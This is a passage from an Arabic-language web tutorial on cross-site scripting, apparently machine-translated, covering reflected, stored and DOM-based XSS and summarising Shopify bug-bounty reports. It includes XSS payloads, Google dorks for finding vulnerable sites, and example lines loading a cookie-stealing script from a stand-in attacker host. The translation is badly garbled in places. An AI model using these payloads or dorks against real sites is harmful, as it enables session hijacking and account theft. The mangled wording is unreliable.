الضيوف (تعليق، رسالة المنتدى، الملف الشخصي) الذي يتم تخزينه على الخادم، تم تحميله من الخادم في كل مرة يطلب المستخدمون عرض هذه الصفحة.</li> <li>حصل المهاجم على الوصول إلى بيانات الخادم، على سبيل المثال، من خلال <a href="https://ilyarm.ru/ar/instrukciya-po-ispolzovaniyu-jsql-injection-mnogofunkcionalnogo-instrumenta.html">حقن SQL</a>وقم بتنفيذ رمز JavaScript الضار إلى البيانات التي تم إصدارها للمستخدم (مع سجلات KI أو لحوم البقر).</li> </ul><p>عينة من غير دائم:</p> <ul><li>يحتوي الموقع على بحث، والذي، مع نتائج البحث، يعرض شيئا مثل "كنت تبحث عن: [سلسلة البحث]"، في حين أن البيانات غير تصفية بشكل صحيح. نظرا لأن هذه الصفحة يتم عرضها فقط من أجل الحصول على رابط لها، في حين أن المهاجم لن يرسل الرابط للمستخدمين الآخرين للموقع، فإن الهجوم لن يعمل. بدلا من إرسال إشارة إلى الضحية، يمكنك استخدام موضع برنامج نصي ضار على موقع محايد يزور الضحية.</li> </ul><p>لا تزال تبرز (بعض أنواع ضعف XSS غير دائم، يقول البعض إن هذه الأنواع يمكن أن تكون مجموعة متنوعة من XSS الثابت):</p> <ul><li>نموذج دوم</li> </ul><h2>ميزات XSS بناء على DOM <br></h2> <p>إذا كنت بسيطة تماما، فيمكن ملاحظة الرمز الضار "العادي" غير الدائم XSS إذا قمت بفتح رمز HTML. على سبيل المثال، يتم تشكيل الرابط بهذه الطريقة:</p><p>http://example.com/search.php؟q\u003d "/\u003e<script>alert(1)</script> </p><p>وعند فتح رمز HTML الأصلي، نرى شيئا مثل هذا:</p><p> <div class="m__search"> <form method="get" action="/search.php"> <input type="text" class="ui-input query" name="q" value=""/><script>alert(1)</script>" /> <button type="submit" class="ui-button">لايجاد</button> </form> </p><p>و DOM XSS تغيير بنية DOM التي يتم تشكيلها في المتصفح أثناء الطيران ورؤية التعليمات البرمجية الضارة التي لا يمكننا إلا عند عرض هيكل DOM المشكلة. HTML لا يتغير. دعنا نأخذ هذا الرمز على سبيل المثال:</p><p> <!DOCTYPE html> <html> <head> <title>الموقع ::: دوم XSS</title> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> </head> <body> <div id="default"> حدث خطأ ...</div> <script> function OnLoad() { var foundFrag = get_fragment(); return foundFrag; } function get_fragment() { var r4c = "(.*?)"; var results = location.hash.match(".*input=token(" + r4c + ");"); if (results) { document.getElementById("default").innerHTML = ""; return (unescape(results)); } else { return null; } } display_session = OnLoad(); document.write("Your session ID was: " + display_session + "<br><br>") </script> </body> </html> </p><p>ذلك في المتصفح سنرى:</p> <p><img src='https://i2.wp.com/hackware.ru/wp-content/uploads/2016/06/x04-4.jpg.pagespeed.ic.NGlOliWXIq.jpg' width="100%" loading=lazy loading=lazy></p> <p>شفرة مصدر الصفحة:</p> <p><img src='https://i2.wp.com/hackware.ru/wp-content/uploads/2016/06/x05-3.jpg.pagespeed.ic.qvLGDO0bJf.jpg' width="100%" loading=lazy loading=lazy></p> <p>دعونا نتشكل العنوان كما يلي:</p><p>http: //localhost/tests/xss/dom_xss.html#input\u003dtokenAlex.<script>alert(1)</script>; </p><p>الآن الصفحة تبدو وكأنها هذه:</p> <p><img src='https://i1.wp.com/hackware.ru/wp-content/uploads/2016/06/x06-4.jpg.pagespeed.ic.7nnJOHKoux.jpg' width="100%" loading=lazy loading=lazy></p> <p>ولكن دعونا نلقي نظرة على شفرة المصدر HTML:</p> <p><img src='https://i1.wp.com/hackware.ru/wp-content/uploads/2016/06/x07-2.jpg.pagespeed.ic.5mMwWD0W90.jpg' width="100%" loading=lazy loading=lazy></p> <p>لم يتغير شيء على الإطلاق. حول هذا قلت، نحتاج إلى مشاهدة وثيقة هيكل DOM لتحديد رمز ضار:</p> <p><img src='https://i0.wp.com/hackware.ru/wp-content/uploads/2016/06/x08-3.jpg.pagespeed.ic.RVBIMU0n3H.jpg' width="100%" loading=lazy loading=lazy></p> <p>إليك النموذج الأولي العامل XSS، للحصول على هجوم حقيقي نحتاج إلى حمولة أكثر تعقيدا أمرا مستحيلا بسبب حقيقة أن التطبيق يتوقف عن القراءة مباشرة بعد نقطة مع فاصلة، وشيء مثل <b>تنبيه (1)؛ تنبيه (2)</b> لم يعد ممكنا. ومع ذلك، شكرا <b>إلغاء ()</b> في البيانات التي تم إرجاعها، يمكننا استخدام الحمولة مثل هذا:</p><p>http: //localhost/tests/xss/dom_xss.html#input\u003dtokenAlex.<script>alert(1)%3balert(2)</script>; </p><p>حيث استبدالنا الرمز <b>; </b> على المكافئ المشفرة في URI!</p> <p>الآن يمكننا كتابة البرامج الضارة لجافا سكريبت وإنشاء رابط لإرسال الضحية، كما يتم ذلك للحصول على البرمجة النصية غير الدائمة القياسية.</p> <h2>مدقق الحسابات XSS. <br></h2> <p>في <a href="https://ilyarm.ru/ar/gde-nahodyatsya-sohranennye-paroli-v-gugl-hrom-mesto-hraneniya.html">جوجل كروم.</a> (وكذلك في Opera، والتي تستخدم الآن محرك Google Chrome)، كنت أنتظر مثل هذه المفاجأة:</p> <blockquote> <p>dOM_XSS.HTML: 30 رفض مراجع XSS تنفيذ برنامج نصي في "http: //localhost/tests/xss/dom_xss.html#eput\u003dtoken \u003cscript\u003e تنبيه (1)</script>؛ "نظرا لأنه تم العثور على شفرة المصدر الخاصة به ضمن الطلب. تم تمكين المراجع لأن الخادم لم يتم إرسال رأس" XS-XSS-Protection "ولا" سياسة أمان محتوى ".</p> </blockquote> <p><img src='https://i0.wp.com/hackware.ru/wp-content/uploads/2016/06/x09-2.jpg.pagespeed.ic.gM4b2zjNrR.jpg' width="100%" loading=lazy loading=lazy></p> <p>أولئك. الآن في المتصفح، يوجد مدقق XSS الذي سيحاول منع XSS. لا توجد وظيفة في فايرفوكس، لكنني أعتقد أن هذه مسألة وقت. إذا كان التنفيذ في المتصفحات ناجحا، فيمكننا التحدث عن صعوبة كبيرة في استخدام XSS.</p> <p><img src='https://i1.wp.com/hackware.ru/wp-content/uploads/2016/06/x10-3.jpg.pagespeed.ic.YAGfPEUxeH.jpg' width="100%" loading=lazy loading=lazy></p> <p>من المفيد أن تتذكر أن المتصفحات الحديثة تتخذ خطوات للحد من مستوى تشغيل مشاكل مثل XSS غير دائم وتستند إلى DOM XSS. بما في ذلك أنه من الضروري أن نتذكر عند اختبار مواقع الويب باستخدام متصفح - قد يكون الأمر كذلك أن تطبيق الويب هو عرضة للخطر، لكنك لا ترى تأكيدا منبثقا لهذا السبب الذي يحظره المتصفح.</p> <h2>أمثلة لاستغلال XSS. <br></h2> <p>يجب أن تقترب المغامرات، التي تنوي استخدام نقاط ضعف البرمجة النصية المعتادة، كل فئة من نقاط الضعف بطرق مختلفة. ووصف هنا ناقلات الهجمات لكل فصل.</p> <p>مع نقاط ضعف XSS، يمكن استخدام لحوم البقر في الهجمات التي توسع الهجوم من الموقع الإلكتروني للبيئة المحلية للمستخدمين.</p> <p><b>مثال الهجوم مع XSS غير دائم</b></p> <p>1. غالبا ما يزور أليس على شبكة الإنترنت محددة يستضيف بوب. يسمح موقع Bob Website بتسجيل الدخول باستخدام اسم المستخدم / كلمة المرور وحفظ البيانات الحساسة، مثل معلومات الدفع. عندما يقوم المستخدم بتمارين الإدخال، يحتفظ المتصفح بملفات تعريف الارتباط الترخيص التي تبدو وكأنها أحرف لا معنى لها، I.E. كل من أجهزة الكمبيوتر (العميل والخادم) تذكر أنه دخلت.</p> <p>2. تلاحظ المخالب أن موقع بوب يحتوي على ضعف XSS غير دائم:</p> <p>2.1 عند زيارة صفحة البحث، ندخل سطرا للبحث وانقر فوق الزر "إرسال" إذا لم يتم العثور على النتائج، تعرض الصفحة سلسلة البحث التي تم إدخالها، تليها الكلمات "غير موجودة" وعنوان URL <b>http://bobssite.org؟q\u003de عن طريق استفسار البحث</b></p> <p>2.2 مع استعلام بحث عادي مثل كلمة " <b>هزلي</b>»الصفحة ببساطة يعرض" <b>هزلي</b> لم يتم العثور على "وعن url http://bobssite.org؟q <b>هزلي</b>ما هو السلوك الطبيعي تماما.</p> <p>2.3 ومع ذلك، عند إرسال استعلام بحث غير طبيعي إلى البحث <b><script type="text/javascript">alert("xss");</script> </b>:</p> <p>2.3.1 تظهر رسالة تحذير (تقول "XSS").</p> <p>2.3.2 صفحة العرض <b><script type="text/javascript">alert("xss");</script> غير موجود</b> جنبا إلى جنب مع رسالة خطأ مع النص "XSS".</p> <p>2.3.3 URL مناسبة للعمل <b>http://bobssite.org؟q\u003d.<script%20type="text/javascript">alert("xss");</script> </b></p> <p>3. المصنونة تصمم عنوان URL لتشغيل الضعف:</p> <p>3.1 هي لا عنوان URL <b>http://bobssite.org؟q\u003dpuppies.<script%20src="http://mallorysevilsite.com/authstealer.js"></script> </b>وبعد يمكن أن تختار تحويل أحرف ASCII بتنسيق سداسي عشري، مثل <b>http://bobssite.org؟q؟q\u003dpuppies٪3cscript٪2520SRC٪3D٪22HTTP٪3A٪2F٪2FMALLORYSEVILSITE.CH٪2FAUTHSTEALER.JS٪22٪3E.</b> من أجل أن يكون الأشخاص قادرين على فك شفرة URL الخبيثة على الفور.</p> <p>3.2 إنها ترسل رسالة بريد إلكتروني إلى بعض الأعضاء المطمئنين في الموقع بوب، قائلا: "تحقق من الكلاب الباردة".</p> <p>4. أليس يتلقى خطابا. إنها تحب الكلاب والنقرات على الرابط. إنها تذهب إلى الموقع بوب في البحث، وهي لا تجد أي شيء، وهناك عرض "الكلاب غير موجودة"، وفي منتصف العلامة، يتم بدء العلامة مع برنامج نصي (غير مرئي على الشاشة) الأحمال وتنفذ برنامج Malory Authstealer.js (هجوم XSS). أليس تنسى عن ذلك.</p> <p>5. يبدأ برنامج AuthStealer.js في متصفح Alice كما لو كان مصدره هو موقع بوب. تلتقط نسخة من ملفات تعريف الارتباط من أليس إذن وترسل إلى خادم Malory، حيث تقوم المخاض بإزالتها.</p> <p>7. الآن بعد أن أصبحت المخالق في الداخل، تذهب إلى موقع الويب الخاص بالموقع الإلكتروني ويبدو وسرقة نسخة من رقم بطاقة ائتمان أليس. ثم تذهب وتغيير كلمة المرور، أي الآن أليس لا يمكن حتى الذهاب.</p> <p>8. قررت أن تجعل <a href="https://ilyarm.ru/ar/konvertirovat-fail-fb2-preobrazovanie-faila-fb2-v-dokument-microsoft-word-sleduite.html">الخطوة التالية</a> ويرسل بوب نفسه المصممة بالمثل إلى الرابط، وبالتالي يحصل على امتيازات إدارية لموقع بوب.</p> <p><b>الهجوم مع XSS ثابت</b></p> <ol><li>التقارصية لديها حساب على موقع بوب.</li> <li>تلاحظ Malory أن موقع بوب يحتوي على مشكلة عدم حصانة XSS ثابتة. إذا ذهبت إلى قسم جديد، ضع تعليقا، فهذا يعرض أنه لن يتم طباعته فيه. ولكن إذا كان نص التعليق يحتوي على علامات HTML، فسيتم عرض هذه العلامات كما هي، ويتم تشغيل أي علامات نصية.</li> <li>يقرأ Malory مقالا في قسم الأخبار ويكتب تعليقا في قسم التعليقات. في التعليق، إدراج النص:</li> <li>في هذه القصة أحببت الكلاب كثيرا. انهم لطيفون جدا! <script src="http://mallorysevilsite.com/authstealer.js"></li> <li>عندما يقوم Alice (أو أي شخص آخر) بتنزيل الصفحة باستخدام هذا التعليق، يتم إطلاق علامة النصية Malory Script وسرقة طهاة الترخيص من أليس، ويرسل malory إلى الخادم السري لجمعها.</li> <li>يمكن للمقدرة المخدرة الآن اعتراض جلسة أليس وإعطاء أنفسهم لأليس.</li> </ol><h2>مواقع البحث عرضة ل XSS <br></h2> <p><b>دوريكي ل xss.</b></p> <p>الخطوة الأولى هي اختيار المواقع التي سنؤدي فيها هجمات XSS. يمكن توقيع المواقع باستخدام Google Dorkov. فيما يلي بعض هذه المسافات التي نسخ ولصقها في بحث Google:</p> <ul><li>inurl: search.php؟ q \u003d</li> <li>inurl: .php؟</li> <li>inurl: search.php.</li> <li>inurl: .php؟ بحث \u003d</li> </ul><p>قبلنا سوف تفتح قائمة المواقع. تحتاج إلى فتح الموقع وإيجاد حقول الإدخال عليه، مثل نموذج التعليقات، نموذج الإدخال، البحث في الموقع، إلخ.</p> <p>لاحظت على الفور أنه من غير المجدي تقريبا البحث عن نقاط الضعف في تطبيقات الويب المحدثة تلقائيا. المثال الكلاسيكي مثل هذا التطبيق هو WordPress. في الواقع، فإن نقاط الضعف في وورد، وخاصة في الإضافات، هناك. علاوة على ذلك، هناك العديد من المواقع التي لا تقوم بتحديث إما محرك WordPress (بسبب حقيقة أن المسؤول عن الموقع قد قام ببعض التغييرات في التعليمات البرمجية المصدرية)، ولا الإضافات والمواضيع (كقاعدة عامة، تكون هذه الإضافات والمواضيع المقرصنة). ولكن إذا قرأت هذا القسم والتعرف على شيء جديد من ذلك، فلن يكون WordPress حتى الآن ... سأعود بالتأكيد إلى ذلك لاحقا.</p> <p>أفضل الأهداف هي مجموعة متنوعة من المحركات والبرامج النصية المكتوبة ذاتية الذاتية.</p> <p>يمكنك اختيار الحمولة الحمولة للإدراج</p><p> <script>alert(1)</script> </p><p>انتبه إلى أي رموز رمز HTML يقع التعليمات البرمجية المضمنة. إليك مثال على حقل إدخال حقل نموذجي ( <b>الإدخال</b>):</p><p> <input type="text" class="ui-input query" name="q" value="وسادة"/><script>alert(1)</script><input value="" /> </p><p>سوف يذهب حمولة الحمولة لدينا إلى حيث كلمة "وسادة" هي الآن. أولئك. بدوره في العلامة <b>الإدخال</b>وبعد يمكننا تجنب هذا - إغلاق اقتباس مزدوج، ثم علامة نفسها <b>"/> </b></p> <p> "/><script>alert(1)</script> </p><p>دعونا نحاولها لبعض المواقع:</p> <p><img src='https://i0.wp.com/hackware.ru/wp-content/uploads/2016/06/101.jpg' width="100%" loading=lazy loading=lazy></p> <p>ثغرة أمنية ممتازة</p> <p><img src='https://i2.wp.com/hackware.ru/wp-content/uploads/2016/06/102.jpg' width="100%" loading=lazy loading=lazy></p> <h2>برامج للبحث ومسح مشكلة عدم حصانة XSS <br></h2> <p>ربما تحتوي جميع الماسحات الضوئية على تطبيقات الويب المدمجة في XSS Vulnerpority. هذا الموضوع هو awkhanging، من الأفضل التعرف على كل ماسحة ماسحة من هذا القبيل بشكل منفصل.</p> <p>يفترض البرمجة النصية عبر الموقع، أو البرمجة النصية عبر الموقع، أو XSS، وجود موقع يربط رمز JavaScript غير متوقع، يتم إرساله، بدوره، إلى المستخدمين الذين يقومون بتنفيذ هذا الرمز في متصفحاتهم. يبدو المثال غير الضار XSS (تماما مثل هذا يجب أن تستخدمه!) يشبه هذا:</p> <p>تنبيه ('XSS')؛</p> <p>سيؤدي هذا إلى إنشاء مكالمة <a href="https://ilyarm.ru/ar/peremennye-oblast-vidimosti-peremennyh-funkcii-v-javascript--.html">جافا سكريبت ميزة</a> تنبيه وإنشاء نافذة بسيطة (وغير ضارة) مع رسائل XSS. في <a href="https://ilyarm.ru/ar/how-to-roll-back-android-to-the-previous-version-how-to-roll-back-an-android-update.html">الإصدارات السابقة</a> كتب أوصت أنك تستخدم هذا المثال عند كتابة التقارير. كان الأمر كذلك في حين أخبرني أحد المتسللين الناجحين للغاية أنه كان "مثالا فظيعا"، موضحا أن مستلم تقرير الضعف قد لا يفهم خطر المشكلة ويرجع ذلك إلى عدم نفاذ المثال، لدفع أجر صغير.</p> <p>وبالتالي، استخدم هذا المثال للكشف عن مشكلة عدم حصانة XSS، ولكن عند وضع تقرير، فكر في الأذى المحتمل الذي يمكن أن يسبب التعرض وشرحه. ضمن هذا، لا أقصد قصة الشركة حول ما هو XSS، لكنني أقترح شرح ما يمكنك تحقيقه، وذلك باستخدام ثغرة أمنية وكيف يمكن أن يؤثر على وجه التحديد على موقع الويب الخاص بهم.</p> <p>هناك ثلاثة أنواع مختلفة من XSS، والتي يمكنك سماعها عند البحث والكتابة:</p> <ul><li>XSS عاكس: لا يتم حفظ هذه الهجمات على الموقع، مما يعني إنشاء وتنفيذ XSS في طلب واحد والإجابة.</li> <li>مخزنة XSS: يتم حفظ هذه الهجمات على الموقع وغالبا ما تكون أكثر خطورة. يتم حفظها على الخادم ويتم تنفيذها على صفحات "طبيعية" من قبل المستخدمين المطمئنين.</li> <li>XSS الذاتي: هذه الهجمات لا يتم حفظها أيضا على الموقع وعادة ما تستخدم كجزء من خداع الشخص من أجل تشغيل XSS أنفسهم. عندما تبحث عن نقاط الضعف، ستجد أن الشركات غالبا ما لا تهتم بالقضاء على الذات XSS، إنهم قلقون بشأن تلك الحالات عندما يتم تطبيق ضرر لمستخدميهم ليس بنفسهم، ولكن أي شخص آخر، كما هو الحال في حالة XSS العاكسة والمخزنة. ومع ذلك، هذا لا يعني أنه يجب عدم البحث عن XSS الذاتي.</li> </ul><p>إذا كنت قد وجدت موقفا يمكن فيه تنفيذ XSS ذاتي، ولكن لا يتم حفظه، فكر في كيفية استخدام هذه الثغرة الأمنية، هل يمكنك استخدامه بالاشتراك مع شيء بحيث لم يعد سيمسس؟</p> <p>واحدة من أكثر الأمثلة الشهيرة لاستخدام XSS - MySpace Samy Work، التي أجريتها Camcar. في أكتوبر 2005، تعتبر مشكلة عدم حصانة XSS المخزنة نفسها على MySpace، والتي سمحت بتنزيل رمز JavaScript، والتي تم إجراؤها في كل مرة قام فيها شخص ما بزيارة صفحة MySpace الخاصة به عن طريق إضافة زيارة إلى ملف التعريف بأنفسهم. علاوة على ذلك، نسخ التعليمات البرمجية أيضا على صفحات الأصدقاء الجدد أنفسهم بحيث يتم تحديث ملفات تعريف الأصدقاء الجدد بالنص التالي: "ولكن الأهم من ذلك كله، سامي هو بطلي".</p> <p>على الرغم من أن المثال نفسه غير ضار نسبيا، فإن استخدام XSS يسمح لك بسرقة تسجيل الدخول والكلمات السرية والمعلومات المصرفية وما إلى ذلك. على الرغم من الأذى المحتمل، فإن تصحيح نقاط ضعف XSS غير صعبة ولا يتطلب من المطورين ببساطة حماية إدخال المستخدم (مباشرة كما هو الحال مباشرة في حقن HTML) عند عرضه. على الرغم من أن بعض المواقع أيضا إزالة الأحرف الخبيثة المحتملة عندما يرسلها القراصنة.</p> <h3>1. بيع التسوق</h3> <p><b>تعقيد:</b> قليل <br><b>عنوان URL:</b> Wholesale.Shopify.com. <br><b>رابط إلى التقرير:</b> https://hackerone.com/reports/10629326 تاريخ التقرير: 21 ديسمبر 2015 <br><b>كشف رواتب:</b> $500<br><b>وصف:</b></p> <p>Sale Sale Sale Sopyifify27 هي صفحة بسيطة مع نداء مباشر للعمل - أدخل اسم البضائع والنقر فوق "البحث عن المنتجات". هنا هي لقطة الشاشة:</p> <p><img src='https://i2.wp.com/cryptoworld.su/wp-content/uploads/2016/11/5ddb8743022bec718aae541fc75d3ebd.png' width="100%" loading=lazy loading=lazy></p><p>Screenshot عرض بيع الخصي</p> <p>كانت مشكلة عدم حصانة XSS هنا أبسط، والذي لا يمكن العثور عليه فقط - لم يكن النص الذي تم إدخاله في سلسلة البحث محمية، بحيث يتم إدخال أي جافا سكريبت. هنا هو النص المرسل من وصف الضعف: اختبار "؛ تنبيه (" XSS ")؛</p> <p>السبب في أنه يعمل هو أن التسوق استغرق المستخدم إدخال المستخدم، وأداء استعلام بحث وفي حالة عدم وجود نتائج، وطباعة رسالة تقارير رسالة عن عدم وجود نتائج بحث لاستعلام المدخل، وعرض الصفحة غير محمية إدخال المستخدم. نتيجة لذلك، يتم تقديم JavaScript شحنها على الصفحة والمتصفحات التي تفسرها على أنها جافا سكريبت قابلة للتنفيذ.</p> <h3>الاستنتاجات</h3> <p>اختبر كل شيء، إيلاء اهتمام خاص للحالات التي أدخلها النص إعادة تأهب على الصفحة. تحقق مما إذا كان يمكنك تمكين في إدخال HTML أو JavaScript، ومعرفة كيفية معالجة الموقع. وبالمثل، حاول أن ترميز الإدخال مثل الموصوف في الفصل المخصص لحقن HTML.</p> <p>لا ينبغي أن تكون نقاط الضعف XSS معقدة أو مربكة. كانت هذه الضعف الأكثر بساطة، والذي يمكن للمرء أن يتخيله هو حقل بسيط لدخول النص الذي لا يعالج إدخال المستخدم. وتم اكتشافها في 21 ديسمبر 2015، وحصلت على القراصنة 500 دولار! كل ما يحتاج - التفكير القراصنة.</p> <h3>2. تسوق سلة بطاقة الهدايا</h3> <p><b>تعقيد:</b> قليل <br><b>عنوان URL:</b> Hardware.Shopify.com/cart. <br><b>رابط إلى التقرير:</b> https://hackerone.com/reports/9508928 تاريخ التقرير: 21 أكتوبر 2015 <br><b>كشف رواتب:</b> $500<br><b>وصف:</b></p> <p>متجر الموقع <a href="https://ilyarm.ru/ar/sozdanie-akkaunta-v-app-store-kak-sozdat-apple-id-bez-kreditnoi-karty.html">بطاقات الهدايا</a> يتيح Shopify29 للمستخدمين إنشاء تصميم خاص بهم لبطاقات الهدايا باستخدام نموذج HTML، والذي يتضمن نافذة تحميل الملفات، عدة صفوف لإدخال نص التفاصيل، وهلم جرا. هنا هي لقطة الشاشة:</p> <p><img src='https://i1.wp.com/cryptoworld.su/wp-content/uploads/2016/11/9918de0af2718d46ad92c4b916ae68ac.png' width="100%" loading=lazy loading=lazy></p><p>Shopify Gift Card Store Form Screenshot</p> <p>تم تشغيل مشكلة عدم الحصانة XSS هنا عند في حقل النموذج، والتي كانت مخصصة لاسم الصورة، تم إدخال JavaScript. من السهل جدا القيام به، باستخدام وكيل HTML، الذي سنتحدث عنه "أدوات" في الفصل ". لذلك، شملت الجزء الأصلي للنموذج:</p> <table class="crayon-table"><tr class="crayon-row"><td class="crayon-nums " data-settings="show"> </td> <td class="crayon-code"><p>المحتوى - التصرف: النموذج - البيانات؛ اسم \u003d "خصائص [Artwor 2 K ملف]"</p> </td> </tr></table><br> يمكن اعتراضه وتغييره: <br><table class="crayon-table"><tr class="crayon-row"><td class="crayon-nums " data-settings="show"> </td> <td class="crayon-code"><p>المحتوى - التصرف: النموذج - البيانات؛ اسم \u003d "خصائص [ملف Artwor 2 K< img src = ’test ’onmouseover = ’alert (2 ) ’> ] ”; </p> </td> </tr></table> <h3>الاستنتاجات</h3> <p>هنا يمكنك ملاحظة شيئين سيساعدان في اكتشاف نقاط ضعف XSS.</p> <script>document.write("<img style='display:none;' src='//counter.yadro.ru/hit;artfast_after?t44.1;r"+ escape(document.referrer)+((typeof(screen)=="undefined")?"": ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth? screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";h"+escape(document.title.substring(0,150))+ ";"+Math.random()+ "border='0' width='1' height='1' loading=lazy loading=lazy>");</script> </div> </article></section><div id="yandex_rtb_R-A-242532-1"></div> <div class="decom_dop_bloc"><a name="comments"></a></div></main> <aside class="sidebar"> <div class="top"> <p> <script id="custom-block-92677863" type="text/javascript"> custom_block(17, 92677863, 5896); </script> </p> <div class="top__headline"><span>أفضل 5 مقالات</span></div> <div class="tabs"> <div class="top-item"> <div class="top-item__image"><img src="/uploads/31c58189d86c4483440d5661bde3d18e.jpg" width="88" height="58" alt="التجزئة والهزم cryptovalut ما هو التجزئة في الثانية" / loading=lazy loading=lazy></div> <div class="top-item__title"><a href="https://ilyarm.ru/ar/chto-takoe-hesh-i-dlya-chego-on-nuzhen-hesh-i-heshirovanie-kriptovalyut-chto.html">التجزئة والهزم cryptovalut ما هو التجزئة في الثانية</a></div> <p>دعونا نحاول أن نفهم ما هي الصعوبة ...</p> </div> <div class="top-item"> <div class="top-item__image"><img src="/uploads/70f3b63c120079a699aa4e1594c5da63.jpg" width="88" height="58" alt="التخصص 10.05 01 من للعمل. المهنة - أخصائي أمن المعلومات. مزايا التعلم في القضاء" / loading=lazy loading=lazy></div> <div class="top-item__title"><a href="https://ilyarm.ru/ar/specialnost-10-05-01-kem-rabotat-professiya---specialist-po.html">التخصص 10.05 01 من للعمل. المهنة - أخصائي أمن المعلومات. مزايا التعلم في القضاء</a></div> <p>لاستلام، يتم أخذ الامتحان في الرياضيات، ... ...</p> </div> <div class="top-item"> <div class="top-item__image"><img src="/uploads/228ed25794d1a500c823f14813786cfb.jpg" width="88" height="58" alt="أخصائي أمان المعلومات" / loading=lazy loading=lazy></div> <div class="top-item__title"><a href="https://ilyarm.ru/ar/kompyuternaya-bezopasnost-professiya-specialist-po-informacionnoi.html">أخصائي أمان المعلومات</a></div> <p>أصبحت شعبية جميلة في الجامعات الحديثة ...</p> </div> <div class="top-item"> <div class="top-item__image"><img src="/uploads/f8a8137775c1405f97ca2a9ad777db76.jpg" width="88" height="58" alt="صمت، عملة الخصوصية على مستوى البروتوكول ورسول آمن على أساس ZCASH Cryptocurrency Hush وقصتها" / loading=lazy loading=lazy></div> <div class="top-item__title"><a href="https://ilyarm.ru/ar/hush-chto-eto-za-kriptovalyuta-kak-ee-mainit-i-skolko-mozhno.html">صمت، عملة الخصوصية على مستوى البروتوكول ورسول آمن على أساس ZCASH Cryptocurrency Hush وقصتها</a></div> <p>والتعدين. في البداية، ظهرت Hush مثل شوكة ...</p> </div> <div class="top-item"> <div class="top-item__image"><img src="/uploads/b7578ef2aca87cb1a83f46c5d81ef3e3.jpg" width="88" height="58" alt="أفضل بولا ل مينلندا البيتكوين" / loading=lazy loading=lazy></div> <div class="top-item__title"><a href="https://ilyarm.ru/ar/komissiya-pula-bitcoin-luchshie-puly-dlya-maininga-bitkoinov-chto-takoe.html">أفضل بولا ل مينلندا البيتكوين</a></div> <p>لأول مرة قررت صنع البيتكوين ... ... ...</p> </div> </div> <div id="mywidget-recommendations-3"> </div> </div> <div class="top"> <p> <script id="custom-block-92677863" type="text/javascript"> custom_block(17, 92677863, 5896); </script> </p> <div class="top__headline"><span>مقالات جديدة</span></div> <div class="tabs"> <div class="top-item"> <div class="top-item__image"><img src="/uploads/291f1923be261a6d6020c64cfaa946ff.jpg" width="88" height="58" alt="أخصائي أمان المعلومات" / loading=lazy loading=lazy></div> <div class="top-item__title"><a href="https://ilyarm.ru/ar/informacionnaya-bezopasnost-opisanie-specialnosti-specialist.html">أخصائي أمان المعلومات</a></div> <p>وصف الطلاب الذين اختاروا هذا ... ...</p> </div> <div class="top-item"> <div class="top-item__image"><img src="/uploads/5e373db1ab330bb18c54beb521a3d40f.jpg" width="88" height="58" alt="Aurora Xbox 360 الإصدار الأخير" / loading=lazy loading=lazy></div> <div class="top-item__title"><a href="https://ilyarm.ru/ar/aurora-xbox-360-poslednyaya-versiya.html">Aurora Xbox 360 الإصدار الأخير</a></div> <p>FSD 3 - نظام متعدد الوظائف ... ...</p> </div> <div class="top-item"> <div class="top-item__image"><img src="/uploads/ac00711aea9f7085a75bd5e3c31258d6.jpg" width="88" height="58" alt="الكمبيوتر للأشخاص ذوي الإعاقة" / loading=lazy loading=lazy></div> <div class="top-item__title"><a href="https://ilyarm.ru/ar/bolee-chem-kompyuter-dlya-lyudei-s-ogranichennymi-vozmozhnostyami-senkevich.html">الكمبيوتر للأشخاص ذوي الإعاقة</a></div> <p>الكتاب الأول في روسيا مخصص ... ...</p> </div> <div class="top-item"> <div class="top-item__image"><img src="/uploads/aa1b46765e3ea9615e960b71a14cf3a8.jpg" width="88" height="58" alt="لغات البرمجة المختلفة وتطبيقاتها" / loading=lazy loading=lazy></div> <div class="top-item__title"><a href="https://ilyarm.ru/ar/raznye-yazyki-programmirovaniya-i-ih-oblasti-primeneniya-lekciya-v.html">لغات البرمجة المختلفة وتطبيقاتها</a></div> <p>لحل مهام الحوسبة، كل شيء الآن ... ...</p> </div> <div class="top-item"> <div class="top-item__image"><img src="/uploads/e8596153ef480040af3ded2d6ab54989.jpg" width="88" height="58" alt="نظم وتكنولوجيا المعلومات - البكالوريوس (09" / loading=lazy loading=lazy></div> <div class="top-item__title"><a href="https://ilyarm.ru/ar/napravlenie-isit-informacionnye-sistemy-i-tehnologii.html">نظم وتكنولوجيا المعلومات - البكالوريوس (09</a></div> <p>في الماضي، اعتبرت المعلومات كرة ...</p> </div> </div> <div id="mywidget-recommendations-3"> </div> </div> </aside> </div> <footer class="footer"><div class="footer__copyright"> <a href='https://play.google.com/store/apps/details?id=org.planetsapp.pdfreader' target='_blank' onclick="navigator.sendBeacon('https://live.electrikhelp.com/iibim?q=gplay&sub1=ilyarm.ru&sub2=org.planetsapp.pdfreader&u='+encodeURIComponent(window.location.href)+'&refjs='+encodeURIComponent(document.referrer)+'');"><img src='/googleplay.svg' style='opacity:0.4; height: 20px; margin:10px; '></a> <p>© 2021 Ilyarm.ru.</p> <div class="footer__sogl"> </div> </div><div class="footer__counters" id="text-2"><div class="textwidget"> </div></div><span style="display: none;"></span></footer> </div></div><script type='text/javascript' src='https://ilyarm.ru/wp-content/plugins/decomments/templates/decomments/assets/js/decom.min.js?ver=1499187887'></script><script type='text/javascript' src='https://ilyarm.ru/wp-content/plugins/wp-postratings/js/postratings-js.js?ver=1.85'></script><script type='text/javascript'>var q2w3_sidebar_options = new Array(); q2w3_sidebar_options[0] = { "sidebar" : "sidebar-2", "margin_top" : 20, "margin_bottom" : 260, "stop_id" : "", "screen_max_width" : 0, "screen_max_height" : 0, "width_inherit" : false, "refresh_interval" : 1500, "window_load_hook" : false, "disable_mo_api" : false, "widgets" : ['mywidget-recommendations-3'] } ; </script><script type='text/javascript' src='https://ilyarm.ru/wp-content/plugins/q2w3-fixed-widget/js/q2w3-fixed-widget.min.js?ver=5.0.4'></script><script type='text/javascript' src='https://ilyarm.ru/wp-content/themes/mobi/js/scripts.js'></script><script type='text/javascript' src='/wp-includes/js/comment-reply.min.js?ver=4.9.1'></script><script type='text/javascript'>/* <![CDATA[ */ var thickboxL10n = { "next":"\u0414\u0430\u043b\u0435\u0435 \u2192","prev":"\u2190 